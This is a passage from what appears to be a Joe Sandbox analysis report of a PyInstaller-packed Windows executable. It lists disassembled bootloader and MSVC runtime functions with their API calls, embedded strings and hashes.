                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5997
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59A9
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59C5
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastProc
                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                      • API String ID: 199729137-653951865
                                                                                      • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                      • Instruction ID: 0de6f68d3225384e993f8530148b715efc1bdc2936629a268c8503234246543b
                                                                                      • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                      • Instruction Fuzzy Hash: B322AC6490EB0B91FBD5BBE5B890574B361AF05795FC41035D83E2A2D8EF3CB16892E0
                                                                                      Function 00007FF7F3DD76C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastProc
                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                      • API String ID: 199729137-3427451314
                                                                                      • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                      • Instruction ID: 2c5970798314cd67353c4770c197becfaa6e639420e33319c842569f418bac22
                                                                                      • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                      • Instruction Fuzzy Hash: 0402AB2490EB0791EBD5BFA5A890578E361AF09755FC41071D83E2A2E8EF3CB15992F0
                                                                                      Function 00007FFE126C94B8 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 382COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                      • API String ID: 2943138195-1482988683
                                                                                      • Opcode ID: 9af3000e46094686c92b09a1ab6ba282d3ea35f814097fcec630d6e6c72122d6
                                                                                      • Instruction ID: cc267c0f1a06e6a2923d8fcf9930fa540f5e774aeef774b5fd791ac74b2cc787
                                                                                      • Opcode Fuzzy Hash: 9af3000e46094686c92b09a1ab6ba282d3ea35f814097fcec630d6e6c72122d6
                                                                                      • Instruction Fuzzy Hash: 2C028172E19E5689FB28AB66DC941FC26B0BB05364FD441B5CA4D12AF8DFBCE524C340
                                                                                      Function 00007FFE126CCDBC Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 290COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                                      • String ID: `anonymous namespace'
                                                                                      • API String ID: 3863519203-3062148218
                                                                                      • Opcode ID: c2c563be3abc2cd025459880134dd91d33137c93c5547e13454a58e5101b2a40
                                                                                      • Instruction ID: f2c33f23ba5ceb0da593fb552625adf753da6fb21eebbfbdea0a2325179c6218
                                                                                      • Opcode Fuzzy Hash: c2c563be3abc2cd025459880134dd91d33137c93c5547e13454a58e5101b2a40
                                                                                      • Instruction Fuzzy Hash: BEE18072A08F869AEB10EF66DC801AC77A0FB59754F804071EA8D17BA9DFBCD525C700
                                                                                      Function 00007FF7F3DD81D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F3DD45F4,00000000,00007FF7F3DD1985), ref: 00007FF7F3DD93C9
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7F3DD86B7,?,?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD822C
                                                                                        • Part of subcall function 00007FF7F3DD2810: MessageBoxW.USER32 ref: 00007FF7F3DD28EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                      • API String ID: 1662231829-930877121
                                                                                      • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                      • Instruction ID: a8701849d75f3fde35995c81857c6491dccaffc4380616e41407ab6daf436257
                                                                                      • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                      • Instruction Fuzzy Hash: BB518711A2D68291FBD1BBA5D8516B9F250AF94780FC44431DA2EAE7D9EE3CE50483F0
                                                                                      Function 00007FFE126CDC24 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 359COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameName::$Name::operator+atolswprintf_s
                                                                                      • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                      • API String ID: 2331677841-2441609178
                                                                                      • Opcode ID: 04052d8e5626c1f24672c52f4d573e3506f88365006a7f318b5907256fbad706
                                                                                      • Instruction ID: 0aa04c2ff9cb02fadf6efb6f70a99f7c387b5e23b75c01969de41cab8b77448e
                                                                                      • Opcode Fuzzy Hash: 04052d8e5626c1f24672c52f4d573e3506f88365006a7f318b5907256fbad706
                                                                                      • Instruction Fuzzy Hash: 4BF1BF22E08E4685FB25BB67DD581FC27B4AF65374F9001B6CE0D26AF5DEBCA5248340
                                                                                      Function 00007FF7F3DD1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                      • API String ID: 2050909247-1550345328
                                                                                      • Opcode ID: d8e1660e306644a3059456114562463667108454f96654c664cb3035ad910b0d
                                                                                      • Instruction ID: 49c70b0aacbad83e1b3dc2436593b74adcfd4fa2dc1f5cb23b310c3ec4c07e38
                                                                                      • Opcode Fuzzy Hash: d8e1660e306644a3059456114562463667108454f96654c664cb3035ad910b0d
                                                                                      • Instruction Fuzzy Hash: 99519E61B0964392EB94BBA194401B9B3A4FF84B94FC44631ED3C2F7D6DE3CE58587A0
                                                                                      Function 00007FFE126CB280 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID:
                                                                                      • API String ID: 2943138195-0
                                                                                      • Opcode ID: 9a3856515ab70ac0cbef49cb78169d28014df4ca819d0bec0dbbb0bc7461e156
                                                                                      • Instruction ID: 874a8ff497e123fc18f1a207610dfdc8a2b5ee38f365e93e9af6a589e55e0dcb
                                                                                      • Opcode Fuzzy Hash: 9a3856515ab70ac0cbef49cb78169d28014df4ca819d0bec0dbbb0bc7461e156
                                                                                      • Instruction Fuzzy Hash: 4AF18D76B08E869EE711EFA6D8901FC37B0EB0435CB804076DA4D57AE9EEB8D525D340
                                                                                      Function 00007FFE126C3334 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 309COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 4223619315-393685449
                                                                                      • Opcode ID: dcb3548c504605ccad87c1df068e82445ce8bfed626f824eb2c4e809fdb80efd
                                                                                      • Instruction ID: fa495b51d8a244a44a73aef56e9429b1c11433372d769c847165c0ba75629b35
                                                                                      • Opcode Fuzzy Hash: dcb3548c504605ccad87c1df068e82445ce8bfed626f824eb2c4e809fdb80efd
                                                                                      • Instruction Fuzzy Hash: 6ED1A572A08F418AEB10EF66D8402AD77A0FB457A8F900176DE8D57BA5CF78E5B0C740
                                                                                      Function 00007FFE126CED94 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 192COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Replicator::operator[]
                                                                                      • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                      • API String ID: 3676697650-3207858774
                                                                                      • Opcode ID: 73310b6c18e80224c33410df5d9c8b136be81ee7f088e8962b8740eac16092a6
                                                                                      • Instruction ID: c42de7e69071db82a31ebe0d54f39b8d83f3da7017fbd61011da14843ee1baba
                                                                                      • Opcode Fuzzy Hash: 73310b6c18e80224c33410df5d9c8b136be81ee7f088e8962b8740eac16092a6
                                                                                      • Instruction Fuzzy Hash: AB919272A08E4A9AFB10AF22DC505B837B1AB58768F8541B2DA8D037F5DFBCE555C340
                                                                                      Function 00007FF7F3DD80C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                      • String ID: Needs to remove its temporary files.
                                                                                      • API String ID: 3975851968-2863640275
                                                                                      • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                      • Instruction ID: fa1522f97fb98892dfe46c309bd3000e60e2174a9f8c404bb961c01f4937379c
                                                                                      • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                      • Instruction Fuzzy Hash: EB218821B09A4282E7916BF9F884179A350EF89B90F984131DE3D5B3D8DE2CD5598360
                                                                                      Function 00007FFE126C9164 Relevance: 16.7, APIs: 11, Instructions: 158COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID:
                                                                                      • API String ID: 2943138195-0
                                                                                      • Opcode ID: 3cac31fbce2037cca8b65a6457a1f6e1f72e09754060cc87a73fdfbcf94b07ef
                                                                                      • Instruction ID: 15e1cfec16e551025ea8043ae1c0099867d2d6a6c4fc9b2ceb2eb1b2429cb1d2
                                                                                      • Opcode Fuzzy Hash: 3cac31fbce2037cca8b65a6457a1f6e1f72e09754060cc87a73fdfbcf94b07ef
                                                                                      • Instruction Fuzzy Hash: BC717D72B15E469DEB15EFA2C8801FC33B5AB0479CB804472DA4D57AE9DFB8D625C380
                                                                                      Function 00007FFE126CAAC8 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                      • API String ID: 2943138195-1464470183
                                                                                      • Opcode ID: 50e8110e92645124a6d82ffc9330fdaa6dc52167fa44e73d911cd3f80f86a47a
                                                                                      • Instruction ID: 2bd209d0f31c5ed96c81f0e2cf5bb0227c93bf671e1507fe54442370fead3985
                                                                                      • Opcode Fuzzy Hash: 50e8110e92645124a6d82ffc9330fdaa6dc52167fa44e73d911cd3f80f86a47a
                                                                                      • Instruction Fuzzy Hash: 1A515E31E18E5ACAF710EF66EC805BC2771BB14368F904175DA4D53AE9DFA8E965C300
                                                                                      Function 00007FF7F3DE6290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: -$:$f$p$p
                                                                                      • API String ID: 3215553584-2013873522
                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                      • Instruction ID: 5e72220c1a9951190760defcdf5b29bcb7f8b6d8fdbf3005cafdf6d8a8781a45
                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                      • Instruction Fuzzy Hash: D112D662E1C24386FBA87E94D144279FE91FB40754FC44235D6A92BAC4DF3CE5C08BA2
                                                                                      Function 00007FF7F3DE0FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: f$f$p$p$f
                                                                                      • API String ID: 3215553584-1325933183
                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                      • Instruction ID: 93c77003ae05eb8f7df6ed0cd9f73ba6a37035c28a0fe4c194a1df7c6810b29a
                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                      • Instruction Fuzzy Hash: 2B12AB62F0C14385FBA8BA94D044279FEA9FB40754FC44235D6BA5A6C4DB7CE4C487A2
                                                                                      Function 00007FFE126C37F8 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 317COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
